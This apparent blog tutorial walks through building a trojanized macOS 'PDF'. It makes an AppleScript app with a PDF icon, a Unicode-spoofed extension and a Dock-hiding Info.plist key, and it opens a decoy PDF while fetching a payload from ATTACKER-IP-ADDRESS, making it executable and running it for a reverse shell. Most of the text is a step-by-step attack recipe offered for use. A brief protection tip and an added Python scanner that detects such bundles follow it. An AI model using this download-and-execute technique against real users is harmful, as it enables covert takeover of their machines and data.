Sooo, today we're gonna poke some fun at Apple, and we're gonna do that by making a trojanized PDF file.
For this to work, you'll need some kind of payload; it could be a simple netcat or an implant from a C2 system. I'll let you decide that :)
You'll also need a Kali system running the C2 and Apache, and a Mac running OS X.

So, the idea we're gonna play with is getting the victim to download an AppleScript that mimics a PDF. But, to keep our victim from wondering too much, we're actually gonna load a real PDF file for him/her to read while we're doing stuff in the background.

First, find a PDF file, import it into GIMP, and choose the first page. The idea is that this file is gonna be used for the icon, so it needs to be a perfect square. To do this go to Image >> Canvas Size, and set the height and width to the same value to get a perfect square.
After that, go to Tools >> Transform Tools, select the image and click "Align center".
Now you should have the image perfectly aligned in the center, so next we need to set the icon size. Apple needs it to be 256 x 256 pixels, so go to Image >> Scale Image and set width and height to 256 pixels. Export this to PNG format, and let's continue by making an icon file for the Mac:

https://cloudconvert.com/png-to-icns

Convert the file to ICNS format and save it.

Now, generate an implant, and copy the real PDF file into a folder served by Apache, along with the icon file and the front-cover.png file. Copy the front-cover.png and the .icns file over to the Mac, and let's move on.

ON THE MAC, open Script Editor and make a new script:

do shell script "curl -g http://ATTACKER-IP-ADDRESS/book.pdf | open -f -a Preview.app & curl -g http://ATTACKER-IP-ADDRESS/payload_file >> /tmp/payload_file; cd /tmp; chmod +x payload_file; ./payload_file"

This is an example script; adjust it for your own needs and current situation (the original `&;` and the redirect into the /tmp directory itself were shell errors and are fixed above). When you have something that works, save it / export it with the file format "Application".
Now right-click the script file, choose "Get Info", and drag the .icns file onto the icon in the top-left corner of that window to change the icon on the script file.

Now, the problem is that OS X will say it's an app file, an application, so we need to spoof the extension, and we can use Unicode for that. So go look at the list, choose a character that fits your current setup, and rename the file: https://en.wikipedia.org/wiki/List_of_Unicode_characters

But wait, there's more. We also need to hide it from the Dock, so how do we do that? Right-click the application file and choose "Show Package Contents". Under "Contents" there's a file called Info.plist; open it and insert this into it:

<key>NSUIElement</key>
<string>1</string>

That's it. Double-click it and see if it loads. If it worked, you should have a window open with the PDF, and get a shell connecting back from the payload. Now, there's a problem with all of this, and that is that the payload is veeeery easy to catch if the user is just a bit informed. Simply list processes with

ps

# or, to identify a known process, e.g. IMPRESS:

ps aux | grep IMPRESS

Remember, this is just a concept. For this to actually hold up you would need some kind of privilege escalation method and a process-hiding rootkit that works under macOS.
But what can you do to protect yourself from this? In Finder, enable "Show all filename extensions", DON'T double-click unknown files, and when you do open an unknown file, list running processes before and after, and check whether something dials out to an unknown location / server.
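As an added defensive example (not part of the original post), here is a small scanner for the exact tells this technique leaves behind: an .app bundle whose name looks like a document or contains non-ASCII / bidi-override characters, and an Info.plist with the Dock-hiding key set. It assumes nothing beyond the Python standard library; the sample bundles it checks are constructed in a temp directory, not real apps.

```python
import os, plistlib, tempfile, unicodedata

# Keys that hide an app from the Dock; the post uses NSUIElement, LSUIElement is the documented name
HIDE_KEYS = ("NSUIElement", "LSUIElement")

def suspicious_name(name):
    """Return reasons a bundle name looks like a document or uses Unicode tricks."""
    reasons = []
    base = name[:-4] if name.endswith(".app") else name
    if any(ord(ch) > 127 for ch in base):
        reasons.append("non-ASCII character in bundle name")
    if any(unicodedata.bidirectional(ch) in ("RLO", "LRO", "RLE", "LRE") for ch in base):
        reasons.append("bidi override character in bundle name")
    if base.lower().endswith((".pdf", ".doc", ".docx", ".txt")):
        reasons.append("document-like extension on an app bundle")
    return reasons

def scan_bundle(path):
    # Name checks plus an Info.plist check for the Dock-hiding keys
    reasons = suspicious_name(os.path.basename(path))
    plist = os.path.join(path, "Contents", "Info.plist")
    if os.path.isfile(plist):
        with open(plist, "rb") as fh:
            info = plistlib.load(fh)
        for key in HIDE_KEYS:
            if info.get(key) in (1, "1", True):
                reasons.append(f"{key} set, app hides from the Dock")
    return reasons

def scan_dir(root):
    """Walk root, inspect every .app bundle, return {bundle path: reasons} for hits."""
    findings = {}
    for dirpath, dirnames, _ in os.walk(root):
        for d in list(dirnames):
            if d.endswith(".app"):
                full = os.path.join(dirpath, d)
                if reasons := scan_bundle(full):
                    findings[full] = reasons
                dirnames.remove(d)  # do not descend into the bundle itself
    return findings

def build_sample_bundle(root, name, info):
    # Constructed sample: a minimal .app bundle with the given Info.plist contents
    contents = os.path.join(root, name, "Contents")
    os.makedirs(contents)
    with open(os.path.join(contents, "Info.plist"), "wb") as fh:
        plistlib.dump(info, fh)

def demo():
    """Constructed sample: one bundle shaped like the post's, one clean app."""
    root = tempfile.mkdtemp()
    build_sample_bundle(root, "book.pdf.app", {"NSUIElement": "1"})
    build_sample_bundle(root, "Calculator.app", {"CFBundleName": "Calculator"})
    return scan_dir(root)
```

Point scan_dir at ~/Downloads or wherever you save attachments; a hit on both the name check and the Dock-hiding key is exactly the shape of bundle described above.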

So, have fun with AppleScript, it's really worth looking into :)
